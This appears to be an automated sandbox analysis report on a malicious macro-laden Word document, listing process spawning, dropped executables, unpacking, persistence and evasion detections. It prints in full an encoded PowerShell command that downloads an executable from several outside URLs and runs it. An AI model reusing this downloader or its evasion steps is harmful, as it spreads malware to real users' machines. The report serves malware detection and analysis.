Source: Nuovo_documento_2019.09.20.docOLE document summary: title field not present or empty
Source: Nuovo_documento_2019.09.20.docOLE document summary: edited time not present or 0
Found command line outputShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........3!j.............3!j....L.,.L| jD......n$(&j...n....L| j.............7!j0..... jL.,.0j%.............$(&j.. j....Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,...........0j%.....A.{u,...............a.{u..0.....X...h.......Ul....................................zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,...................A.{u,...............a.{u..0.....X...h...$...bl....................................zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,...........0j%.....A.{u,...............a.{u..0.....X...h...$....l....................................zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,...................A.{u,...............a.{u..0.....X...h........l....................................zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................#...0j%.0...A.{u................a.{u..0.....X...h...d....l..................#.................zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................#.......0...A.{u................a.{u..0.....X...h...d....l..................#.......l.........zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........L.......'...........A.{uL...............a.{u..0.....X...h...d....l..................'.......,.........zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........L.......+...........A.{uL...............a.{u..0.....X...h...d....m..................+.......,.........zu........Jump to behavior
Might use command line argumentsShow sources
Source: C:\Users\user\982.exeCommand line argument: PB4_2_0042E6A0
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Sample is known by AntivirusShow sources
Source: Nuovo_documento_2019.09.20.docVirustotal: Detection: 22%
Sample requires command line parameters (based on API chain)Show sources
Source: C:\Users\user\982.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_5-2847
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -encod JABtAEgASwB3AFIARgA9ACcASgBJAGIAbgB2AGYAbwBMACcAOwAkAGIAMwBhAFMAaQBtADQAXwAgAD0AIAAnADkAOAAyACcAOwAkAEcAdgBIAEsAMgBNAD0AJwBuAF8AdgBQAGoAcgBwACcAOwAkAFEAegBpAEEAQgBCADYATAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgAzAGEAUwBpAG0ANABfACsAJwAuAGUAeABlACcAOwAkAGoAdwB0ADcAXwBOAD0AJwBaADYARwA2AG8AVABvAFMAJwA7ACQAegBfAG4AZgAwADkAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEUASQBwAFMARwB3AHUAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAGEAYgBpAG8AcwBkAGUAbABhAG0AbwByAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAdAB5AEUAcQBvAEUAbABvAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBlAHUAcgBvAGEAdQBzAGkAbABpAC4AaQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGkASQBGAFMAWABUAFcAbQBOAC8AQABoAHQAdABwAHMAOgAvAC8AbwBwAGUAbAAuAGsAbQAuAHUAYQAvAGIAbABvAGcAcwAvADMAdQBqAHUAXwB0AGkAbwB3AGYAOQBpAC0AMQA0ADkALwBAAGgAdAB0AHAAcwA6AC8ALwBoAGEAYgBsAGEAYgBlAHMAdABvAHAALgBsAGkAdgBlAC8AcgBxAGIAZQA5AHAALwBwAEsAawBMAGkAdQBxAEcAagAvA
Source: unknownProcess created: C:\Users\user\982.exe 'C:\Users\user\982.exe'
Source: unknownProcess created: C:\Users\user\982.exe 'C:\Users\user\982.exe'
Source: unknownProcess created: C:\Users\user\982.exe --4e722ada
Source: unknownProcess created: C:\Users\user\982.exe --4e722ada
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Source: unknownProcess created: C:\Windows\System32\sortedwatched.exe C:\Windows\system32\sortedwatched.exe
Source: unknownProcess created: C:\Windows\System32\sortedwatched.exe C:\Windows\system32\sortedwatched.exe
Source: unknownProcess created: C:\Windows\System32\sortedwatched.exe --2a75e385
Source: unknownProcess created: C:\Windows\System32\sortedwatched.exe --2a75e385
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\982.exe 'C:\Users\user\982.exe' Jump to behavior
Source: C:\Users\user\982.exeProcess created: C:\Users\user\982.exe 'C:\Users\user\982.exe' Jump to behavior
Source: C:\Users\user\982.exeProcess created: C:\Users\user\982.exe --4e722adaJump to behavior
Source: C:\Users\user\982.exeProcess created: C:\Users\user\982.exe --4e722adaJump to behavior
Source: C:\Windows\System32\sortedwatched.exeProcess created: C:\Windows\System32\sortedwatched.exe C:\Windows\system32\sortedwatched.exeJump to behavior
Source: C:\Windows\System32\sortedwatched.exeProcess created: C:\Windows\System32\sortedwatched.exe --2a75e385Jump to behavior
Source: C:\Windows\System32\sortedwatched.exeProcess created: C:\Windows\System32\sortedwatched.exe --2a75e385Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\982.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: ntdll.pdb source: 982.exe, 00000004.00000003.293286536.01BC0000.00000004.00000001.sdmp, 982.exe, 00000006.00000003.297891020.01B50000.00000004.00000001.sdmp, sortedwatched.exe, 00000009.00000003.318288495.00CE0000.00000004.00000001.sdmp, sortedwatched.exe, 0000000B.00000003.322801776.00EB0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb3 source: 982.exe, 00000004.00000003.293286536.01BC0000.00000004.00000001.sdmp, 982.exe, 00000006.00000003.297891020.01B50000.00000004.00000001.sdmp, sortedwatched.exe, 00000009.00000003.318288495.00CE0000.00000004.00000001.sdmp, sortedwatched.exe, 0000000B.00000003.322801776.00EB0000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)Show sources
Source: C:\Users\user\982.exeUnpacked PE file: 5.2.982.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Users\user\982.exeUnpacked PE file: 7.2.982.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Windows\System32\sortedwatched.exeUnpacked PE file: 10.2.sortedwatched.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Windows\System32\sortedwatched.exeUnpacked PE file: 12.2.sortedwatched.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Detected unpacking (overwrites its own PE header)Show sources
Source: C:\Users\user\982.exeUnpacked PE file: 5.2.982.exe.400000.0.unpack
Source: C:\Users\user\982.exeUnpacked PE file: 7.2.982.exe.400000.0.unpack
Source: C:\Windows\System32\sortedwatched.exeUnpacked PE file: 10.2.sortedwatched.exe.400000.0.unpack
Source: C:\Windows\System32\sortedwatched.exeUnpacked PE file: 12.2.sortedwatched.exe.400000.0.unpack
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\982.exeCode function: 4_2_00432522 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,4_2_00432522
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\982.exeCode function: 4_2_0042937D push ecx; ret 4_2_00429390
Source: C:\Users\user\982.exeCode function: 4_2_00429303 push ecx; ret 4_2_00429316
Source: C:\Users\user\982.exeCode function: 4_2_002D2B12 push eax; ret 4_2_002D2B1C
Source: C:\Users\user\982.exeCode function: 4_2_002D2CD3 push eax; ret 4_2_002D2CD4
Source: C:\Users\user\982.exeCode function: 5_2_004123D3 push eax; ret 5_2_004123DD
Source: C:\Users\user\982.exeCode function: 5_2_00412594 push eax; ret 5_2_00412595
Source: C:\Users\user\982.exeCode function: 6_2_003F2CD3 push eax; ret 6_2_003F2CD4
Source: C:\Users\user\982.exeCode function: 6_2_003F2B12 push eax; ret 6_2_003F2B1C
Source: C:\Users\user\982.exeCode function: 7_2_004123D3 push eax; ret 7_2_004123DD
Source: C:\Users\user\982.exeCode function: 7_2_00412594 push eax; ret 7_2_00412595
Source: C:\Users\user\982.exeCode function: 7_1_004123D3 push eax; ret 7_1_004123DD
Source: C:\Users\user\982.exeCode function: 7_1_00412594 push eax; ret 7_1_00412595
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003F2CD3 push eax; ret 9_2_003F2CD4
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003F2B12 push eax; ret 9_2_003F2B1C
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_00502CD3 push eax; ret 11_2_00502CD4
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_00502B12 push eax; ret 11_2_00502B1C
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_004123D3 push eax; ret 12_2_004123DD
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_00412594 push eax; ret 12_2_00412595
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_1_004123D3 push eax; ret 12_1_004123DD
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_1_00412594 push eax; ret 12_1_00412595

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows\System32\sortedwatched.exeExecutable created and started: C:\Windows\System32\sortedwatched.exeJump to behavior
Drops PE filesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\982.exeJump to dropped file
Drops PE files to the user directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\982.exeJump to dropped file
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Users\user\982.exePE file moved: C:\Windows\System32\sortedwatched.exeJump to behavior

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\982.exeJump to dropped file
Contains functionality to start windows servicesShow sources
Source: C:\Users\user\982.exeCode function: 7_2_0040F7A0 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,7_2_0040F7A0

Hooking and other Techniques for Hiding and Protection:

barindex
Document contains an embedded VBA macro which may check the recent opened files (possible anti-VM)Show sources
Source: Nuovo_documento_2019.09.20.docOLE, VBA macro line: If RecentFiles.Count > 3 Then
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Users\user\982.exeFile opened: C:\Windows\system32\sortedwatched.exe:Zone.Identifier read attributes | deleteJump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\982.exeCode function: 4_2_00417380 IsWindowVisible,IsIconic,4_2_00417380
Source: C:\Users\user\982.exeCode function: 4_2_0040B948 IsIconic,GetWindowPlacement,GetWindowRect,4_2_0040B948
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
